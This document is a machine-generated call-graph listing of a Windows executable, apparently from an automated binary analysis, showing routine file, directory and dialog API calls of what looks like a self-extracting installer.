7ff6063842ea 21481->21483 21484 7ff606384326 21482->21484 21487 7ff606383a64 99 API calls 21482->21487 21483->21482 21485 7ff6063842f6 CloseHandle 21483->21485 21484->21448 21485->21482 21487->21484 21488->20850 21491 7ff6063a4d50 21493 7ff6063a4c83 21491->21493 21492 7ff6063a5390 _com_raise_error 14 API calls 21492->21493 21493->21492 21498 7ff606399c49 8 API calls _handle_error 21516 7ff60638e760 21519 7ff60638e7c0 SystemTimeToFileTime 21516->21519 21520 7ff60638e832 21519->21520 21527 7ff60638e8b7 21519->21527 21521 7ff606386768 9 API calls 21520->21521 21523 7ff60638e837 21521->21523 21522 7ff6063a5c30 _handle_error 8 API calls 21524 7ff60638e7bb 21522->21524 21525 7ff60638e84e FileTimeToSystemTime TzSpecificLocalTimeToSystemTime SystemTimeToFileTime SystemTimeToFileTime 21523->21525 21526 7ff60638e842 LocalFileTimeToFileTime 21523->21526 21525->21527 21526->21527 21527->21522 21557 7ff606393e60 21558 7ff606393ec2 21557->21558 21561 7ff606393f05 21557->21561 21606 7ff606394ee4 21558->21606 21562 7ff606393fb4 21561->21562 21604 7ff606384c40 101 API calls 21561->21604 21564 7ff606393fe0 21562->21564 21595 7ff606394049 21562->21595 21566 7ff606394023 21564->21566 21570 7ff606393fea 21564->21570 21623 7ff606395b60 21566->21623 21567 7ff606393f8c 21622 7ff606384e00 SetEndOfFile 21567->21622 21568 7ff606394ee4 59 API calls 21572 7ff606393ee2 21568->21572 21655 7ff606384160 82 API calls 21570->21655 21572->21561 21575 7ff606393ee6 21572->21575 21574 7ff606393f98 21605 7ff606384c40 101 API calls 21574->21605 21654 7ff606383a9c 99 API calls 21575->21654 21578 7ff60639412c 21579 7ff606394031 21578->21579 21582 7ff606394d74 104 API calls 21578->21582 21583 7ff606394168 21579->21583 21686 7ff606383c7c 82 API calls 21579->21686 21580 7ff6063a5c30 _handle_error 8 API calls 21584 7ff6063942f0 21580->21584 21581 7ff606394000 21585 7ff606394940 106 API calls 21581->21585 21598 7ff606393efc 21581->21598 21582->21579 21603 7ff6063941fd 21583->21603 21687 7ff606398db4 8 API calls 21583->21687 21588 7ff606394013 21585->21588 21656 7ff606385790 21588->21656 21591 7ff606394244 21592 7ff6063942c1 21591->21592 21593 7ff6063942cf 21591->21593 21689 7ff606384e00 SetEndOfFile 21591->21689 21592->21593 21634 7ff606394940 21592->21634 21593->21598 21599 7ff606385790 51 API calls 21593->21599 21595->21578 21670 7ff60639511c 21595->21670 21679 7ff6063900f0 21595->21679 21682 7ff606394d74 21595->21682 21598->21580 21599->21598 21601 7ff60639418e 21602 7ff60639511c 120 API calls 21601->21602 21601->21603 21602->21601 21603->21591 21688 7ff6063838e0 82 API calls 2 library calls 21603->21688 21604->21567 21605->21562 21690 7ff606386288 21606->21690 21608 7ff606394f5b 21610 7ff6063a5ae0 4 API calls 21608->21610 21609 7ff606394f42 21609->21608 21611 7ff606394f53 21609->21611 21613 7ff606394f65 21610->21613 21713 7ff606385db0 51 API calls 2 library calls 21611->21713 21697 7ff606384334 21613->21697 21615 7ff606394ffb 21617 7ff6063a5c30 _handle_error 8 API calls 21615->21617 21619 7ff606393ec7 21617->21619 21618 7ff606395023 21620 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21618->21620 21619->21561 21642 7ff60638552c 21619->21642 21621 7ff606395028 21620->21621 21622->21574 21624 7ff606395b99 21623->21624 21625 7ff60639511c 120 API calls 21624->21625 21629 7ff606395e0e 21624->21629 21630 7ff6063900f0 SendDlgItemMessageW 21624->21630 21631 7ff606395d91 21624->21631 21633 7ff606384d50 101 API calls 21624->21633 21748 7ff606396294 21624->21748 21770 7ff606396b60 21624->21770 21779 7ff60639699c 125 API calls _handle_error 21624->21779 21625->21624 21629->21579 21630->21624 21631->21629 21632 7ff606394d74 104 API calls 21631->21632 21632->21629 21633->21624 21635 7ff60639495a 21634->21635 21640 7ff6063949b2 21634->21640 21789 7ff606384c70 21635->21789 21637 7ff606394a2d 21637->21593 21638 7ff60639499e 21641 7ff6063842d0 100 API calls 21638->21641 21640->21637 21794 7ff606385ff4 21640->21794 21641->21640 21643 7ff606385671 21642->21643 21650 7ff606385562 21642->21650 21644 7ff6063a5c30 _handle_error 8 API calls 21643->21644 21645 7ff606385687 21644->21645 21645->21568 21646 7ff60638564b 21646->21643 21647 7ff606385c60 56 API calls 21646->21647 21647->21643 21648 7ff6063812bc 33 API calls 21648->21650 21650->21646 21650->21648 21651 7ff60638569c 21650->21651 21808 7ff606385c60 21650->21808 21652 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21651->21652 21653 7ff6063856a1 21652->21653 21654->21598 21655->21581 21657 7ff6063857bb DeleteFileW 21656->21657 21658 7ff6063857b8 21656->21658 21659 7ff6063857d1 21657->21659 21666 7ff606385850 21657->21666 21658->21657 21661 7ff6063880b0 49 API calls 21659->21661 21660 7ff6063a5c30 _handle_error 8 API calls 21662 7ff606385865 21660->21662 21663 7ff6063857f6 21661->21663 21662->21598 21664 7ff6063857fa DeleteFileW 21663->21664 21665 7ff606385817 21663->21665 21664->21665 21665->21666 21667 7ff606385875 21665->21667 21666->21660 21668 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21667->21668 21669 7ff60638587a 21668->21669 21671 7ff606395137 21670->21671 21677 7ff60639512f 21670->21677 21674 7ff60639518a 21671->21674 21671->21677 21828 7ff6063953bc 21671->21828 21674->21677 21856 7ff606398d6c 8 API calls 21674->21856 21675 7ff6063951e1 21857 7ff606383df0 99 API calls 2 library calls 21675->21857 21677->21595 21679->21595 21680 7ff6063a3a80 21679->21680 21681 7ff6063a3a8f SendDlgItemMessageW 21680->21681 21684 7ff606394dad 21682->21684 21683 7ff606394dd3 21683->21595 21684->21683 21984 7ff606384e18 21684->21984 21686->21583 21687->21601 21688->21591 21689->21592 21714 7ff60638885c 21690->21714 21695 7ff6063862ba FindClose 21696 7ff6063862cf 21695->21696 21696->21609 21700 7ff60638436a 21697->21700 21698 7ff60638439e 21701 7ff60638447f 21698->21701 21702 7ff6063880b0 49 API calls 21698->21702 21699 7ff6063843b1 CreateFileW 21699->21698 21700->21698 21700->21699 21703 7ff6063844af 21701->21703 21706 7ff606381c80 33 API calls 21701->21706 21705 7ff606384409 21702->21705 21704 7ff6063a5c30 _handle_error 8 API calls 21703->21704 21707 7ff6063844c4 21704->21707 21708 7ff60638440d CreateFileW 21705->21708 21709 7ff606384446 21705->21709 21706->21703 21707->21615 21707->21618 21708->21709 21709->21701 21710 7ff6063844d8 21709->21710 21711 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21710->21711 21712 7ff6063844dd 21711->21712 21713->21608 21715 7ff60638887a 21714->21715 21744 7ff60638367c 21715->21744 21718 7ff60638647c 21719 7ff6063864b9 FindFirstFileW 21718->21719 21720 7ff606386592 FindNextFileW 21718->21720 21722 7ff6063865b3 21719->21722 21724 7ff6063864de 21719->21724 21720->21722 21723 7ff6063865a1 GetLastError 21720->21723 21725 7ff6063865d1 21722->21725 21728 7ff606381c80 33 API calls 21722->21728 21742 7ff606386580 21723->21742 21726 7ff6063880b0 49 API calls 21724->21726 21733 7ff6063812bc 33 API calls 21725->21733 21727 7ff606386504 21726->21727 21730 7ff606386508 FindFirstFileW 21727->21730 21731 7ff606386527 21727->21731 21728->21725 21729 7ff6063a5c30 _handle_error 8 API calls 21732 7ff6063862b4 21729->21732 21730->21731 21731->21722 21735 7ff60638656f GetLastError 21731->21735 21737 7ff6063866d4 21731->21737 21732->21695 21732->21696 21734 7ff6063865fb 21733->21734 21736 7ff606388dc4 47 API calls 21734->21736 21735->21742 21738 7ff606386609 21736->21738 21739 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21737->21739 21741 7ff6063866cf 21738->21741 21738->21742 21740 7ff6063866da 21739->21740 21743 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21741->21743 21742->21729 21743->21737 21746 7ff6063836c6 memcpy_s 21744->21746 21745 7ff6063a5c30 _handle_error 8 API calls 21747 7ff60638378a 21745->21747 21746->21745 21747->21696 21747->21718 21750 7ff6063962eb memcpy_s 21748->21750 21749 7ff60639511c 120 API calls 21749->21750 21750->21749 21752 7ff60639633d 21750->21752 21751 7ff60639511c 120 API calls 21751->21752 21752->21751 21755 7ff60639639f 21752->21755 21769 7ff60639650a 21752->21769 21753 7ff6063a5c30 _handle_error 8 API calls 21754 7ff60639697b 21753->21754 21754->21624 21756 7ff60639511c 120 API calls 21755->21756 21759 7ff6063963f8 21755->21759 21755->21769 21756->21755 21757 7ff6063964a2 21780 7ff60639569c 21757->21780 21759->21757 21760 7ff60639511c 120 API calls 21759->21760 21759->21769 21760->21759 21761 7ff606396500 21762 7ff60639511c 120 API calls 21761->21762 21763 7ff60639674c 21761->21763 21761->21769 21762->21761 21764 7ff60639569c 8 API calls 21763->21764 21765 7ff6063967c0 21764->21765 21766 7ff60639569c 8 API calls 21765->21766 21765->21769 21767 7ff606396896 21766->21767 21767->21769 21784 7ff606395e44 21767->21784 21769->21753 21773 7ff606396ba8 21770->21773 21771 7ff60639511c 120 API calls 21771->21773 21772 7ff606396bdf 21774 7ff60639511c 120 API calls 21772->21774 21775 7ff606396bee 21772->21775 21778 7ff606396c2d 21772->21778 21773->21771 21773->21772 21774->21772 21775->21624 21776 7ff60639511c 120 API calls 21776->21778 21777 7ff606394d74 104 API calls 21777->21778 21778->21775 21778->21776 21778->21777 21779->21624 21781 7ff6063956fe memcpy_s 21780->21781 21782 7ff6063a5c30 _handle_error 8 API calls 21781->21782 21783 7ff606395ae9 21782->21783 21783->21761 21787 7ff606395ea7 21784->21787 21785 7ff606396260 21785->21769 21786 7ff606394d74 104 API calls 21786->21787 21787->21785 21787->21786 21788 7ff60639511c 120 API calls 21787->21788 21788->21787 21790 7ff606384c94 21789->21790 21792 7ff606384ca4 21789->21792 21791 7ff606384c9a FlushFileBuffers 21790->21791 21790->21792 21791->21792 21793 7ff606384d0e SetFileTime 21792->21793 21793->21638 21795 7ff60638601b 21794->21795 21796 7ff60638601e SetFileAttributesW 21794->21796 21795->21796 21797 7ff606386034 21796->21797 21804 7ff6063860b5 21796->21804 21798 7ff6063880b0 49 API calls 21797->21798 21800 7ff606386059 21798->21800 21799 7ff6063a5c30 _handle_error 8 API calls 21801 7ff6063860ca 21799->21801 21802 7ff60638605d SetFileAttributesW 21800->21802 21803 7ff60638607c 21800->21803 21801->21637 21802->21803 21803->21804 21805 7ff6063860da 21803->21805 21804->21799 21806 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21805->21806 21807 7ff6063860df 21806->21807 21810 7ff606385c8f 21808->21810 21809 7ff606385cbc 21812 7ff606385890 51 API calls 21809->21812 21810->21809 21811 7ff606385ca8 CreateDirectoryW 21810->21811 21811->21809 21813 7ff606385d59 21811->21813 21814 7ff606385cca 21812->21814 21815 7ff606385d69 21813->21815 21817 7ff606385ff4 51 API calls 21813->21817 21816 7ff606385d6d GetLastError 21814->21816 21818 7ff6063880b0 49 API calls 21814->21818 21819 7ff6063a5c30 _handle_error 8 API calls 21815->21819 21816->21815 21817->21815 21820 7ff606385cf8 21818->21820 21821 7ff606385d95 21819->21821 21822 7ff606385cfc CreateDirectoryW 21820->21822 21823 7ff606385d17 21820->21823 21821->21650 21822->21823 21824 7ff606385d50 21823->21824 21825 7ff606385daa 21823->21825 21824->21813 21824->21816 21826 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21825->21826 21827 7ff606385daf 21826->21827 21855 7ff606384a70 104 API calls 21828->21855 21829 7ff6063a5c30 _handle_error 8 API calls 21830 7ff606395176 21829->21830 21830->21674 21830->21675 21830->21677 21831 7ff606395408 21832 7ff606386288 55 API calls 21831->21832 21854 7ff606395621 21831->21854 21833 7ff606395483 21832->21833 21834 7ff606395501 21833->21834 21835 7ff6063954ab 21833->21835 21836 7ff6063954ff 21834->21836 21905 7ff606391dd0 21834->21905 21835->21836 21858 7ff606391bf4 21835->21858 21916 7ff606394e68 21836->21916 21839 7ff6063954bc 21841 7ff6063812bc 33 API calls 21839->21841 21843 7ff6063954f3 21841->21843 21842 7ff60639553b 21844 7ff6063812bc 33 API calls 21842->21844 21853 7ff60639558f 21842->21853 21889 7ff606388d18 21843->21889 21847 7ff60639557b 21844->21847 21846 7ff60639568f 21848 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21846->21848 21923 7ff606390114 21847->21923 21849 7ff606395694 21848->21849 21851 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21849->21851 21852 7ff60639569a 21851->21852 21853->21846 21853->21849 21853->21854 21854->21829 21855->21831 21857->21677 21939 7ff606387af8 47 API calls 21858->21939 21860 7ff606391c2e 21861 7ff6063812bc 33 API calls 21860->21861 21862 7ff606391c5a 21861->21862 21940 7ff606390aa0 CompareStringW 21862->21940 21864 7ff606391c82 21865 7ff6063812bc 33 API calls 21864->21865 21869 7ff606391cdc 21864->21869 21866 7ff606391cb1 21865->21866 21941 7ff606390ad0 CompareStringW 21866->21941 21867 7ff606381b70 31 API calls 21872 7ff606391d9a 21867->21872 21868 7ff606391dc7 21874 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21868->21874 21869->21868 21870 7ff606391d7b 21869->21870 21875 7ff606391dc2 21869->21875 21870->21867 21873 7ff6063a5c30 _handle_error 8 API calls 21872->21873 21876 7ff606391da9 21873->21876 21878 7ff606391dcd 21874->21878 21877 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21875->21877 21876->21839 21877->21868 21879 7ff606391bf4 64 API calls 21878->21879 21880 7ff606391df9 21879->21880 21881 7ff6063861e8 swprintf 46 API calls 21880->21881 21882 7ff606391e2a 21881->21882 21883 7ff6063812bc 33 API calls 21882->21883 21884 7ff606391e55 21883->21884 21885 7ff606388d18 47 API calls 21884->21885 21886 7ff606391e62 21885->21886 21887 7ff6063a5c30 _handle_error 8 API calls 21886->21887 21888 7ff606391e72 21887->21888 21888->21839 21890 7ff606388d41 21889->21890 21891 7ff606388dbe 21890->21891 21892 7ff606388d4d 21890->21892 21950 7ff60638353c 47 API calls 21891->21950 21942 7ff606386e5c 21892->21942 21897 7ff606381c04 33 API calls 21898 7ff606388d92 21897->21898 21899 7ff606381b70 31 API calls 21898->21899 21900 7ff606388d9d 21899->21900 21901 7ff606381b70 31 API calls 21900->21901 21902 7ff606388da6 21901->21902 21903 7ff6063a5c30 _handle_error 8 API calls 21902->21903 21904 7ff606388db3 21903->21904 21904->21836 21906 7ff606391bf4 64 API calls 21905->21906 21907 7ff606391df9 21906->21907 21908 7ff6063861e8 swprintf 46 API calls 21907->21908 21909 7ff606391e2a 21908->21909 21910 7ff6063812bc 33 API calls 21909->21910 21911 7ff606391e55 21910->21911 21912 7ff606388d18 47 API calls 21911->21912 21913 7ff606391e62 21912->21913 21914 7ff6063a5c30 _handle_error 8 API calls 21913->21914 21915 7ff606391e72 21914->21915 21915->21836 21917 7ff6063a5ae0 4 API calls 21916->21917 21918 7ff606394e76 21917->21918 21922 7ff6063846a0 54 API calls 21918->21922 21919 7ff606394ebd 21920 7ff606394ed4 21919->21920 21952 7ff606383cd0 100 API calls 2 library calls 21919->21952 21920->21842 21922->21919 21924 7ff6063a3bf8 21923->21924 21925 7ff606388b28 47 API calls 21924->21925 21926 7ff6063a3c2b 21925->21926 21927 7ff60638aee0 48 API calls 21926->21927 21928 7ff6063a3c3f 21927->21928 21929 7ff60638da04 48 API calls 21928->21929 21930 7ff6063a3c4f 21929->21930 21931 7ff606381b70 31 API calls 21930->21931 21932 7ff6063a3c5a 21931->21932 21953 7ff6063a376c 21932->21953 21935 7ff606381b70 31 API calls 21936 7ff6063a3c7b 21935->21936 21937 7ff6063a5c30 _handle_error 8 API calls 21936->21937 21938 7ff6063a3c88 21937->21938 21938->21853 21939->21860 21940->21864 21941->21869 21943 7ff606386e7c 21942->21943 21944 7ff606386ed6 21943->21944 21945 7ff606386e95 21943->21945 21951 7ff606381bd4 33 API calls std::_Xinvalid_argument 21944->21951 21948 7ff606387050 4 API calls 21945->21948 21949 7ff606386ec3 21948->21949 21949->21897 21952->21920 21954 7ff6063a3798 21953->21954 21955 7ff6063812bc 33 API calls 21954->21955 21956 7ff6063a37a8 21955->21956 21965 7ff6063a2bf4 21956->21965 21959 7ff6063a37ef 21960 7ff6063a5c30 _handle_error 8 API calls 21959->21960 21962 7ff6063a3801 21960->21962 21961 7ff6063a3807 21963 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21961->21963 21962->21935 21964 7ff6063a380c 21963->21964 21979 7ff60639e96c PeekMessageW 21965->21979 21968 7ff6063a2c93 SendMessageW SendMessageW 21970 7ff6063a2cf4 SendMessageW 21968->21970 21971 7ff6063a2cd9 21968->21971 21969 7ff6063a2c45 21972 7ff6063a2c51 ShowWindow SendMessageW SendMessageW 21969->21972 21973 7ff6063a2d13 21970->21973 21974 7ff6063a2d16 SendMessageW SendMessageW 21970->21974 21971->21970 21972->21968 21973->21974 21975 7ff6063a2d43 SendMessageW 21974->21975 21976 7ff6063a2d68 SendMessageW 21974->21976 21975->21976 21977 7ff6063a5c30 _handle_error 8 API calls 21976->21977 21978 7ff6063a2d8c 21977->21978 21978->21959 21978->21961 21980 7ff60639e9d0 GetDlgItem 21979->21980 21981 7ff60639e98c GetMessageW 21979->21981 21980->21968 21980->21969 21982 7ff60639e9ab IsDialogMessageW 21981->21982 21983 7ff60639e9ba TranslateMessage DispatchMessageW 21981->21983 21982->21980 21982->21983 21983->21980 21985 7ff606384e4b 21984->21985 21986 7ff606384e44 21984->21986 21987 7ff606384e55 GetStdHandle 21985->21987 21991 7ff606384e63 21985->21991 21988 7ff6063a5c30 _handle_error 8 API calls 21986->21988 21987->21991 21989 7ff606384fee 21988->21989 21989->21683 21990 7ff606384ebe WriteFile 21990->21991 21991->21986 21991->21990 21992 7ff606384e7e WriteFile 21991->21992 21995 7ff606384f56 21991->21995 22003 7ff606383a18 101 API calls 21991->22003 21992->21991 21993 7ff606384eb4 21992->21993 21993->21991 21993->21992 21996 7ff6063812bc 33 API calls 21995->21996 21997 7ff606384f85 21996->21997 22004 7ff606384190 99 API calls _com_raise_error 21997->22004 22003->21991 22965 7ff6063b0e5c 22966 7ff6063b0ea7 22965->22966 22970 7ff6063b0e6b abort 22965->22970 22972 7ff6063b0bac 15 API calls _invalid_parameter_noinfo_noreturn 22966->22972 22968 7ff6063b0e8e HeapAlloc 22969 7ff6063b0ea5 22968->22969 22968->22970 22970->22966 22970->22968 22971 7ff6063af0c8 abort 2 API calls 22970->22971 22971->22970 22972->22969 20489 7ff6063a5a00 20490 7ff6063a5a16 _com_error::_com_error 20489->20490 20495 7ff6063a7848 20490->20495 20492 7ff6063a5a27 20500 7ff6063a5390 20492->20500 20496 7ff6063a7884 RtlPcToFileHeader 20495->20496 20497 7ff6063a7867 20495->20497 20498 7ff6063a78ab RaiseException 20496->20498 20499 7ff6063a789c 20496->20499 20497->20496 20498->20492 20499->20498 20526 7ff6063a4fe8 20500->20526 20503 7ff6063a5444 20507 7ff6063a54cd LoadLibraryExA 20503->20507 20509 7ff6063a5539 20503->20509 20510 7ff6063a5615 20503->20510 20515 7ff6063a554d 20503->20515 20504 7ff6063a541b 20505 7ff6063a52f8 DloadReleaseSectionWriteAccess 6 API calls 20504->20505 20506 7ff6063a5428 RaiseException 20505->20506 20519 7ff6063a5645 20506->20519 20508 7ff6063a54e4 GetLastError 20507->20508 20507->20509 20512 7ff6063a550e 20508->20512 20513 7ff6063a54f9 20508->20513 20514 7ff6063a5544 FreeLibrary 20509->20514 20509->20515 20534 7ff6063a52f8 20510->20534 20511 7ff6063a55ab GetProcAddress 20511->20510 20518 7ff6063a55c0 GetLastError 20511->20518 20517 7ff6063a52f8 DloadReleaseSectionWriteAccess 6 API calls 20512->20517 20513->20509 20513->20512 20514->20515 20515->20510 20515->20511 20520 7ff6063a551b RaiseException 20517->20520 20521 7ff6063a55d5 20518->20521 20520->20519 20521->20510 20522 7ff6063a52f8 DloadReleaseSectionWriteAccess 6 API calls 20521->20522 20523 7ff6063a55f7 RaiseException 20522->20523 20524 7ff6063a4fe8 DloadAcquireSectionWriteAccess 6 API calls 20523->20524 20525 7ff6063a5611 20524->20525 20525->20510 20527 7ff6063a4ffe 20526->20527 20533 7ff6063a5063 20526->20533 20542 7ff6063a5094 20527->20542 20530 7ff6063a505e 20532 7ff6063a5094 DloadAcquireSectionWriteAccess 3 API calls 20530->20532 20532->20533 20533->20503 20533->20504 20535 7ff6063a5308 20534->20535 20541 7ff6063a5361 20534->20541 20536 7ff6063a5094 DloadAcquireSectionWriteAccess 3 API calls 20535->20536 20537 7ff6063a530d 20536->20537 20538 7ff6063a535c 20537->20538 20539 7ff6063a5268 DloadProtectSection 3 API calls 20537->20539 20540 7ff6063a5094 DloadAcquireSectionWriteAccess 3 API calls 20538->20540 20539->20538 20540->20541 20541->20519 20543 7ff6063a50af 20542->20543 20544 7ff6063a5003 20542->20544 20543->20544 20545 7ff6063a50b4 GetModuleHandleW 20543->20545 20544->20530 20549 7ff6063a5268 20544->20549 20546 7ff6063a50ce GetProcAddress 20545->20546 20547 7ff6063a50c9 20545->20547 20546->20547 20548 7ff6063a50e3 GetProcAddress 20546->20548 20547->20544 20548->20547 20551 7ff6063a528a DloadProtectSection 20549->20551 20550 7ff6063a5292 20550->20530 20551->20550 20552 7ff6063a52ca VirtualProtect 20551->20552 20554 7ff6063a5134 VirtualQuery GetSystemInfo 20551->20554 20552->20550 20554->20552 21499 7ff6063af40c 21506 7ff6063b0470 21499->21506 21511 7ff6063b0950 35 API calls 2 library calls 21506->21511 21510 7ff6063b047b 21512 7ff6063b0570 35 API calls abort 21510->21512 21511->21510 21528 7ff606390120 21529 7ff6063a3c98 21528->21529 21530 7ff6063a3d4f 21529->21530 21531 7ff6063a3cd7 21529->21531 21532 7ff60638aee0 48 API calls 21530->21532 21533 7ff60638aee0 48 API calls 21531->21533 21534 7ff6063a3d63 21532->21534 21535 7ff6063a3ceb 21533->21535 21536 7ff60638da04 48 API calls 21534->21536 21537 7ff60638da04 48 API calls 21535->21537 21542 7ff6063a3cfa memcpy_s 21536->21542 21537->21542 21538 7ff606381b70 31 API calls 21539 7ff6063a3df9 21538->21539 21554 7ff60638210c 21539->21554 21541 7ff6063a3e84 21544 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21541->21544 21542->21538 21542->21541 21543 7ff6063a3e7e 21542->21543 21546 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 21543->21546 21547 7ff6063a3e8a 21544->21547 21546->21541 21555 7ff606382116 SetDlgItemTextW 21554->21555 21556 7ff606382113 21554->21556 21556->21555 22975 7ff6063b9b30 22976 7ff6063b9b4e 22975->22976 22977 7ff6063a7848 _com_raise_error 2 API calls 22976->22977 22978 7ff6063b9b57 22977->22978 22991 7ff606390d80 31 API calls 22978->22991 22980 7ff6063b9b7c 22981 7ff6063a7848 _com_raise_error 2 API calls 22980->22981 22982 7ff6063b9b9c 22981->22982 22992 7ff606390db4 31 API calls 22982->22992 22984 7ff6063b9bbb 22993 7ff6063922e8 22984->22993 22991->22980 22992->22984 22994 7ff6063922ff 22993->22994 22995 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22994->22995 22996 7ff606392328 22995->22996 22997 7ff6063812bc 33 API calls 22996->22997 22998 7ff6063923ff 22997->22998 22999 7ff606390114 83 API calls 22998->22999 23000 7ff606392413 22999->23000 23001 7ff606381b70 31 API calls 23000->23001 23002 7ff60639241d 23001->23002 23003 7ff6063a5ae0 4 API calls 23002->23003 23004 7ff606392481 23003->23004 23009 7ff6063912cc 31 API calls 23004->23009 23006 7ff606393d9a 23010 7ff606391a70 31 API calls _invalid_parameter_noinfo_noreturn 23006->23010 23008 7ff606393db2 23009->23006 23010->23008 23026 7ff6063a4f32 23027 7ff6063a5390 _com_raise_error 14 API calls 23026->23027 23028 7ff6063a4f71 23027->23028 23084 7ff6063a4f2d 23085 7ff6063a4e65 23084->23085 23086 7ff6063a5390 _com_raise_error 14 API calls 23085->23086 23087 7ff6063a4ea4 23086->23087 22007 7ff60639ece0 22350 7ff60638215c 22007->22350 22009 7ff60639ed2b 22010 7ff60639ed3f 22009->22010 22011 7ff60639f9e3 22009->22011 22156 7ff60639ed5c 22009->22156 22014 7ff60639ed4f 22010->22014 22015 7ff60639ee2b 22010->22015 22010->22156 22560 7ff6063a2ee0 22011->22560 22019 7ff60639ed57 22014->22019 22020 7ff60639edf9 22014->22020 22022 7ff60639eee1 22015->22022 22027 7ff60639ee45 22015->22027 22016 7ff6063a5c30 _handle_error 8 API calls 22021 7ff60639fea0 22016->22021 22017 7ff60639fa19 22024 7ff60639fa40 GetDlgItem SendMessageW 22017->22024 22025 7ff60639fa25 SendDlgItemMessageW 22017->22025 22018 7ff60639fa0a SendMessageW 22018->22017 22029 7ff60638aee0 48 API calls 22019->22029 22019->22156 22026 7ff60639ee1b EndDialog 22020->22026 22020->22156 22358 7ff606381ebc GetDlgItem 22022->22358 22028 7ff606387a28 35 API calls 22024->22028 22025->22024 22026->22156 22030 7ff60638aee0 48 API calls 22027->22030 22032 7ff60639fa97 GetDlgItem 22028->22032 22033 7ff60639ed86 22029->22033 22034 7ff60639ee63 SetDlgItemTextW 22030->22034 22579 7ff606382120 22032->22579 22583 7ff606381a94 34 API calls _handle_error 22033->22583 22039 7ff60639ee76 22034->22039 22037 7ff60639ef45 22054 7ff60639f815 22037->22054 22178 7ff60639ef01 EndDialog 22037->22178 22038 7ff60639ef58 GetDlgItem 22043 7ff60639ef9f SetFocus 22038->22043 22044 7ff60639ef72 SendMessageW SendMessageW 22038->22044 22045 7ff60639ee90 GetMessageW 22039->22045 22039->22156 22042 7ff60639ed96 22050 7ff60639edac 22042->22050 22057 7ff60638210c SetDlgItemTextW 22042->22057 22046 7ff60639f042 22043->22046 22047 7ff60639efb5 22043->22047 22044->22043 22052 7ff60639eeae IsDialogMessageW 22045->22052 22045->22156 22051 7ff606382314 33 API calls 22046->22051 22053 7ff60638aee0 48 API calls 22047->22053 22048 7ff60639ef2a 22055 7ff606381b70 31 API calls 22048->22055 22064 7ff60639feb3 22050->22064 22050->22156 22058 7ff60639f07c 22051->22058 22052->22039 22059 7ff60639eec3 TranslateMessage DispatchMessageW 22052->22059 22060 7ff60639efbf 22053->22060 22061 7ff60638aee0 48 API calls 22054->22061 22055->22156 22057->22050 22372 7ff6063a2ad0 22058->22372 22059->22039 22074 7ff6063812bc 33 API calls 22060->22074 22065 7ff60639f826 SetDlgItemTextW 22061->22065 22070 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22064->22070 22069 7ff60638aee0 48 API calls 22065->22069 22075 7ff60639f858 22069->22075 22076 7ff60639feb8 22070->22076 22073 7ff60638aee0 48 API calls 22078 7ff60639f0a5 22073->22078 22079 7ff60639efe8 22074->22079 22090 7ff6063812bc 33 API calls 22075->22090 22085 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22076->22085 22082 7ff60638da04 48 API calls 22078->22082 22083 7ff6063a2bf4 24 API calls 22079->22083 22087 7ff60639f0b8 22082->22087 22088 7ff60639eff5 22083->22088 22091 7ff60639febe 22085->22091 22096 7ff6063a2bf4 24 API calls 22087->22096 22088->22076 22105 7ff60639f038 22088->22105 22123 7ff60639f881 22090->22123 22103 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22091->22103 22100 7ff60639f0c8 22096->22100 22111 7ff606381b70 31 API calls 22100->22111 22102 7ff60639f92a 22107 7ff60638aee0 48 API calls 22102->22107 22108 7ff60639fec4 22103->22108 22104 7ff60639f13c 22116 7ff60639f16a 22104->22116 22585 7ff60638587c 22104->22585 22105->22104 22584 7ff6063a3584 33 API calls 2 library calls 22105->22584 22118 7ff60639f934 22107->22118 22126 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22108->22126 22121 7ff60639f0d6 22111->22121 22124 7ff60638552c 56 API calls 22116->22124 22139 7ff6063812bc 33 API calls 22118->22139 22121->22091 22121->22105 22123->22102 22128 7ff6063812bc 33 API calls 22123->22128 22131 7ff60639f180 22124->22131 22133 7ff60639feca 22126->22133 22134 7ff60639f8cf 22128->22134 22137 7ff60639f184 GetLastError 22131->22137 22138 7ff60639f19c 22131->22138 22144 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22133->22144 22140 7ff60638aee0 48 API calls 22134->22140 22137->22138 22386 7ff606388cf8 22138->22386 22143 7ff60639f95d 22139->22143 22146 7ff60639f8da 22140->22146 22142 7ff60639f15e 22588 7ff60639d908 12 API calls _handle_error 22142->22588 22160 7ff6063812bc 33 API calls 22143->22160 22150 7ff60639fed0 22144->22150 22599 7ff606381170 33 API calls memcpy_s 22146->22599 22161 7ff6063aae94 _invalid_parameter_noinfo_noreturn 31 API calls 22150->22161 22153 7ff60639f1ae 22158 7ff60639f1b5 GetLastError 22153->22158 22159 7ff60639f1c4 22153->22159 22155 7ff60639f8f2 22167 7ff606381c04 33 API calls 22155->22167 22156->22016 22158->22159 22163 7ff60639f26c 22159->22163 22166 7ff60639f27b 22159->22166 22168 7ff60639f1db GetTickCount 22159->22168 22164 7ff60639f99e 22160->22164 22165 7ff60639fed6 22161->22165 22163->22166 22186 7ff60639f6c9 22163->22186 22180 7ff606381b70 31 API calls 22164->22180 22169 7ff60638215c 61 API calls 22165->22169 22170 7ff60639f5a0 22166->22170 22175 7ff606387c10 34 API calls 22166->22175 22171 7ff60639f90e 22167->22171 22389 7ff606385238 22168->22389 22173 7ff60639ff34 22169->22173 